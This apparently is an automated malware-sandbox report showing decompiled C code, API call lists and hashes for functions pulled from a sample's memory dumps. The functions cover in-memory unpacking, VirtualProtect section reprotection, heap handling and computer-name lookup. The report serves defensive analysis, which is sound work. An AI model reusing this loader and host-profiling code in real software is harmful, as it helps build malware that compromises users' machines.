0x004014ea
0x004014ef
0x00401500
0x00401503
0x00401509
0x0040150e
0x004015c1
0x00401514
0x00401514
0x0040151a
0x00401589
0x0040151c
0x0040151c
0x0040151f
0x00401521
0x00401529
0x0040152c
0x0040152f
0x00401537
0x00401542
0x00401543
0x00401544
0x00401561
0x0040156f
0x00401576
0x00401579
0x0040157c
0x00401584
0x00000000
0x00000000
0x00401534
0x00401534
0x00401586
0x00401593
0x004015a8
0x00401595
0x0040159e
0x004015a3
0x004015b9
0x004015b9
0x004015c8
0x004015ce

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,00401A1F,00000000), ref: 00401503
memcpy.NTDLL(?,00401A1F,?,?,?,?,?,?,?,00401A1F,00000000,00000030,?,00000000), ref: 0040159E
VirtualFree.KERNELBASE(00401A1F,00000000,00008000,?,?,?,?,?,?,00401A1F,00000000), ref: 004015B9

Strings

Sep 21 2021, xrefs: 0040153A

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Sep 21 2021
API String ID: 4010158826-1195158264
Opcode ID: b7dea1d35fbcc01febc5ee39c7371c435db85bd8d238cfeac80864c67dbb79ad
Instruction ID: fec1488cb982f4c8a1e82a672e9de5c8239e5989683b6aa0ff19b00d826874a3
Opcode Fuzzy Hash: b7dea1d35fbcc01febc5ee39c7371c435db85bd8d238cfeac80864c67dbb79ad
Instruction Fuzzy Hash: 2C311071D00219EFDB01DF94DD85BEEB7B8BF48304F10416AE905BB291D775AA05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 03C41128, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E03C41128(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x3c4d32c; // 0x47595b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x3c4d32c; // 0x47595b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x3c4d030) {
					HeapFree( *0x3c4d238, 0, _t8);
				}
				_t9 = E03C44A2A(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x3c4d32c; // 0x47595b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x03c41128
0x03c41128
0x03c41131
0x03c41141
0x03c41141
0x03c41146
0x03c4114b
0x00000000
0x00000000
0x03c4113b
0x03c4113b
0x03c4114d
0x03c41151
0x03c41163
0x03c41163
0x03c4116e
0x03c41173
0x03c41176
0x03c4117b
0x03c4117f
0x03c41185

APIs

RtlEnterCriticalSection.NTDLL(04759570), ref: 03C41131
Sleep.KERNEL32(0000000A,?,03C430F3), ref: 03C4113B
HeapFree.KERNEL32(00000000,00000000,?,03C430F3), ref: 03C41163
RtlLeaveCriticalSection.NTDLL(04759570), ref: 03C4117F

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 82419f256f520b0c41f03777275c3a22a397bb9f77eaaeee5fdb14a3b8341fe3
Instruction ID: 39f08bd0ff834dd1a8ca87e3c45d12ef58b815a5b22ac652681d7cbe281ebd76
Opcode Fuzzy Hash: 82419f256f520b0c41f03777275c3a22a397bb9f77eaaeee5fdb14a3b8341fe3
Instruction Fuzzy Hash: 9FF0F878601240AFE724FF79E88CF167BE8AF04780B088404F543CA26AD721EC81DB25

Uniqueness

Uniqueness Score: -1.00%

Function 03C45319, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C45319(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E03C4155A(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x3c4d2a8; // 0xb0a5a8
				_t4 = _t24 + 0x3c4edc0; // 0x4759368
				_t5 = _t24 + 0x3c4ed68; // 0x4f0053
				_t26 = E03C45D79( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x3c4d2a8; // 0xb0a5a8
						_t11 = _t32 + 0x3c4edb4; // 0x475935c
						_t48 = _t11;
						_t12 = _t32 + 0x3c4ed68; // 0x4f0053
						_t52 = E03C4272D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x3c4d2a8; // 0xb0a5a8
							_t13 = _t35 + 0x3c4edfe; // 0x30314549
							if(E03C45B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x3c4d25c - 6;
								if( *0x3c4d25c <= 6) {
									_t42 =  *0x3c4d2a8; // 0xb0a5a8
									_t15 = _t42 + 0x3c4ec0a; // 0x52384549
									E03C45B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x3c4d2a8; // 0xb0a5a8
							_t17 = _t38 + 0x3c4edf8; // 0x47593a0
							_t18 = _t38 + 0x3c4edd0; // 0x680043
							_t45 = E03C44538(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x3c4d238, 0, _t52);
						}
					}
					HeapFree( *0x3c4d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E03C44FF0(_t54);
				}
				return _t45;
			}

0x03c45319
0x03c45329
0x03c4532c
0x03c45333
0x03c45335
0x03c45335
0x03c45338
0x03c4533d
0x03c45344
0x03c45351
0x03c45356
0x03c4535a
0x03c45368
0x03c45376
0x03c4537a
0x03c4540b
0x03c4540b
0x03c45380
0x03c45380
0x03c45385
0x03c45385
0x03c4538c
0x03c45398
0x03c4539a
0x03c4539c
0x03c4539e
0x03c453a5
0x03c453b7
0x03c453b9
0x03c453c0
0x03c453c2
0x03c453c9
0x03c453d4
0x03c453d4
0x03c453c0
0x03c453d9
0x03c453de
0x03c453e5
0x03c45403
0x03c45405
0x03c45405
0x03c4539c
0x03c45417
0x03c45417
0x03c45419
0x03c4541e
0x03c45420
0x03c45420
0x03c4542b

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04759368,00000000,?,7519F710,00000000,7519F730), ref: 03C45368
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,047593A0,?,00000000,30314549,00000014,004F0053,0475935C), ref: 03C45405
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,03C47CCB), ref: 03C45417

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c7b0f522f0a5e676c33545d4dbe780446539dcb5de4790885169424d6acc8635
Instruction ID: b437d0901282b6bf8a523fd0e31ed1cbc7afc71ff95d32936c2185c627ac91a8
Opcode Fuzzy Hash: c7b0f522f0a5e676c33545d4dbe780446539dcb5de4790885169424d6acc8635
Instruction Fuzzy Hash: E631A17A900208BFDB21FBA5EC48E9EBBBDEB45700F1601A5F601DB161D770AE45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03C42C58, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E03C42C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				void* _t13;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x3c4d340; // 0x4759c08
				_push(0x800);
				_push(0);
				_push( *0x3c4d238);
				if( *0x3c4d24c >= 5) {
					_t13 = RtlAllocateHeap(); // executed
					if(_t13 == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x3c4d24c =  *0x3c4d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E03C42C0D(_t44, _t40);
						_t18 = E03C431A8(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x3c4d24c < 5) {
								 *0x3c4d24c =  *0x3c4d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E03C45433();
						HeapFree( *0x3c4d238, 0, _t40);
						goto L10;
					}
					_t24 = E03C49BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E03C45450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}

0x03c42c58
0x03c42c58
0x03c42c5b
0x03c42c5c
0x03c42c66
0x03c42c6d
0x03c42c72
0x03c42c74
0x03c42c7a
0x03c42c9a
0x03c42ca2
0x03c42cba
0x03c42cbc
0x03c42cbd
0x03c42cbf
0x03c42cfd
0x03c42cfd
0x03c42d03
0x03c42d09
0x03c42d09
0x03c42cc1
0x03c42cc7
0x03c42cca
0x03c42cd9
0x03c42cdb
0x03c42ce2
0x03c42d16
0x03c42d1b
0x03c42d1d
0x03c42d1f
0x03c42d1f
0x00000000
0x03c42d1d
0x03c42ce4
0x03c42ce9
0x03c42cf7
0x00000000
0x03c42cf7
0x03c42cb1
0x03c42cb6
0x03c42cb6
0x00000000
0x03c42cb6
0x03c42c84
0x00000000
0x00000000
0x03c42c93
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 03C42C7C

Part of subcall function 03C45450: GetTickCount.KERNEL32 ref: 03C45464
Part of subcall function 03C45450: wsprintfA.USER32 ref: 03C454B4
Part of subcall function 03C45450: wsprintfA.USER32 ref: 03C454D1
Part of subcall function 03C45450: wsprintfA.USER32 ref: 03C454FD
Part of subcall function 03C45450: HeapFree.KERNEL32(00000000,?), ref: 03C4550F
Part of subcall function 03C45450: wsprintfA.USER32 ref: 03C45530
Part of subcall function 03C45450: HeapFree.KERNEL32(00000000,?), ref: 03C45540
Part of subcall function 03C45450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03C4556E
Part of subcall function 03C45450: GetTickCount.KERNEL32 ref: 03C4557F

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 03C42C9A
HeapFree.KERNEL32(00000000,00000002,03C47D16,?,03C47D16,00000002,?,?,03C4312C,?), ref: 03C42CF7

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: 9b5076a5faa98add86af494e54379c8ea0106e04959e38ab7a6d2d185460f144
Instruction ID: 6a5ad321568dab2380200176184b2b67811b6e3b4e291ecb6cdf3e287887221f
Opcode Fuzzy Hash: 9b5076a5faa98add86af494e54379c8ea0106e04959e38ab7a6d2d185460f144
Instruction Fuzzy Hash: 70219F79201204ABDB21EF59E885F9A7BBCFB48305F008426F902DB251DB71EE00DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAE, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401BAE(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x403100;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x00401bb8
0x00401bc5
0x00401bcb
0x00401bd7
0x00401be7
0x00401be9
0x00401bf1
0x00401c86
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00401bf7
0x00401bf7
0x00401bf7
0x00401bfb
0x00000000
0x00000000
0x00401c07
0x00401c0b
0x00401c2f
0x00401c33
0x00401c47
0x00401c47
0x00401c4d
0x00401c5c
0x00401c60
0x00401c68
0x00401c68
0x00401c70
0x00401c73
0x00401c80
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c80
0x00401c3b
0x00401c3f
0x00401c45
0x00000000
0x00000000
0x00000000
0x00401c45
0x00401c13
0x00401c17
0x00401c21
0x00401c19
0x00401c19
0x00401c19
0x00000000
0x00401c17
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401BE7
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401C5C
GetLastError.KERNEL32 ref: 00401C62

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: e200ab23c86fef14a09755118c0811a6a082a578495e72e8b41036a9ef0c01c2
Instruction ID: b2c716a2ba88aaf16e81d6a071de259e4f48580833c7ea43561533825924546f
Opcode Fuzzy Hash: e200ab23c86fef14a09755118c0811a6a082a578495e72e8b41036a9ef0c01c2
Instruction Fuzzy Hash: EB215C7180420ADFDB18DF95C985ABAF7F4FB18345F01446AD602E7168E3B8EA64CB58

Uniqueness

Uniqueness Score: -1.00%

Function 03C44A2A, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E03C44A2A(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E03C41525(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x3c4c284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x03c44a2e
0x03c44a3b
0x03c44a3d
0x03c44a3e
0x03c44a46
0x03c44a46
0x03c44a4a
0x00000000
0x00000000
0x03c44a41
0x03c44a42
0x03c44a45
0x03c44a45
0x03c44a52
0x03c44a57
0x03c44a5c
0x03c44a64
0x03c44a6a
0x03c44a6c
0x03c44a6f
0x03c44a73
0x03c44a75
0x03c44a78
0x03c44a78
0x03c44a79
0x03c44a7b
0x03c44a78
0x03c44a85
0x03c44a88
0x03c44a8b
0x03c44a8c
0x03c44a8e
0x03c44a95
0x03c44a95
0x03c44aa1

APIs

StrChrA.SHLWAPI(?,00000020,00000000,047595AC,03C430F3,?,03C41173,?,047595AC,?,03C430F3), ref: 03C44A46
StrTrimA.KERNELBASE(?,03C4C284,00000002,?,03C41173,?,047595AC,?,03C430F3), ref: 03C44A64
StrChrA.SHLWAPI(?,00000020,?,03C41173,?,047595AC,?,03C430F3), ref: 03C44A6F

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 781b4c2960b137b8315752b123d7b1fe6a09a6e8b25504547dd42eefc5adb0c0
Instruction ID: 96887e8980219b017186d704946a8a5ea216efe395013372d47d1e4793cb1fc2
Opcode Fuzzy Hash: 781b4c2960b137b8315752b123d7b1fe6a09a6e8b25504547dd42eefc5adb0c0
Instruction Fuzzy Hash: 2701DF723003066FE724DE6B8C4AF67BB9DEBC5340F288021B946CF282DA70C9428764

Uniqueness

Uniqueness Score: -1.00%

Function 0041970F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

Qa, xrefs: 00419709

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID:
String ID: Qa
API String ID: 0-3901847582
Opcode ID: 1a5d0e7a21e9ded79f3144e41253d67be37013d1d8d597091abbc164341298d6
Instruction ID: 8c18d85d1c90dbeb634fca1f0b429f820f9a712e4ccde4b8b3cf1993ac4718ad
Opcode Fuzzy Hash: 1a5d0e7a21e9ded79f3144e41253d67be37013d1d8d597091abbc164341298d6
Instruction Fuzzy Hash: 490144B4610109EBEB54CF59C964BEB33B4AF08304F10845AF82987281D73CEE92CB55

Uniqueness

Uniqueness Score: -1.00%

Function 03C476E7, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E03C476E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E03C48A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x3c4d2a8; // 0xb0a5a8
						_t20 = _t68 + 0x3c4e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E03C4A6BC(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x03c476ed
0x03c476f0
0x03c47700
0x03c47709
0x03c4770d
0x03c477db
0x03c477e1
0x03c477e1
0x03c47727
0x03c4772c
0x03c47730
0x03c47736
0x03c4773b
0x03c47742
0x03c47751
0x03c47751
0x03c47755
0x03c47757
0x03c47763
0x03c4776e
0x03c47779
0x03c4777d
0x03c47787
0x03c4778b
0x03c4778d
0x03c47792
0x03c47799
0x03c477a9
0x03c477a9
0x03c47792
0x03c4778b
0x03c477ab
0x03c477b0
0x03c477b5
0x03c477b5
0x03c477b8
0x03c477c1
0x03c477c6
0x03c477c6
0x03c477cb
0x03c477d0
0x03c477d0
0x03c477cb
0x03c47755
0x03c477d2
0x03c477d8
0x00000000

APIs

Part of subcall function 03C48A19: SysAllocString.OLEAUT32(80000002), ref: 03C48A76
Part of subcall function 03C48A19: SysFreeString.OLEAUT32(00000000), ref: 03C48ADC

SysFreeString.OLEAUT32(?), ref: 03C477C6
SysFreeString.OLEAUT32(03C44BD8), ref: 03C477D0

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 5d2c5451594d88f3930dea39d183d05fb90f77232c994031563534deb2499936
Instruction ID: 53b0c98668d6abd2d09aae30f5e0203bd9e7cd20a0de28bd0c5366f9dbec02e9
Opcode Fuzzy Hash: 5d2c5451594d88f3930dea39d183d05fb90f77232c994031563534deb2499936
Instruction Fuzzy Hash: AB314A7A500118AFCB12DF54C988C9BBBB9FFC97407554658F915DB220E331DD51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004013C4, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004013C4() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x403104;
				if( *0x4030ec > 5) {
					_t16 = _t15 + 0x4040f9;
				} else {
					_t16 = _t15 + 0x4040b1;
				}
				E0040136F(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E00401862( &_v32,  &_v16,  *0x403100 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x4030f8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00401E22(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x4030f8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00401EF4(_t44, _t32 + 4);
						}
					}
					_t25 = E00401D7E(_v28); // executed
				}
				ExitThread(_t25);
			}

0x004013ca
0x004013db
0x004013e5
0x004013dd
0x004013dd
0x004013dd
0x004013ec
0x004013f5
0x004013fa
0x00401418
0x00401474
0x0040141a
0x00401420
0x00401426
0x00401434
0x00401438
0x0040143f
0x00401448
0x0040144c
0x00401452
0x00401463
0x00401454
0x0040145a
0x0040145a
0x00401452
0x0040146b
0x0040146b
0x00401476

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 00401420
ExitThread.KERNEL32 ref: 00401476

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 92b9446ae56c0096a6d51e073f835bbe8f5f7c68a162cf9a1ffdb1302b28142d
Instruction ID: 81bba9c2c985b02d9343bb148b21bee0e14b39adfd693302f6ca951fdd028e92
Opcode Fuzzy Hash: 92b9446ae56c0096a6d51e073f835bbe8f5f7c68a162cf9a1ffdb1302b28142d
Instruction Fuzzy Hash: 4811AC72104201AAE711DB65CD49E9B77ECAB44308F00883AB505F71F0EB34EA058B5A

Uniqueness

Uniqueness Score: -1.00%

Function 03C4831C, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E03C4831C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E03C41525(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E03C48B22(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x03c48321
0x03c4832c
0x03c4832e
0x03c48334
0x03c48336
0x03c4833b
0x03c48344
0x03c48348
0x03c48351
0x03c48355
0x03c48364
0x03c48357
0x03c48358
0x03c4835d
0x03c4835d
0x03c48355
0x03c48348
0x03c4836d

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,03C49C7E,7519F710,00000000,?,?,03C49C7E), ref: 03C48334

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

GetComputerNameExA.KERNELBASE(00000003,00000000,03C49C7E,03C49C7F,?,?,03C49C7E), ref: 03C48351

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: bbf35a5fe29d583569ed88ee4d6cfa9fc687966343d00530c2b117941af07311
Instruction ID: f76f46e8ad672d204bf8a0c80fcec1b77aad4da3247676dcaa242a40d2660ec2
Opcode Fuzzy Hash: bbf35a5fe29d583569ed88ee4d6cfa9fc687966343d00530c2b117941af07311
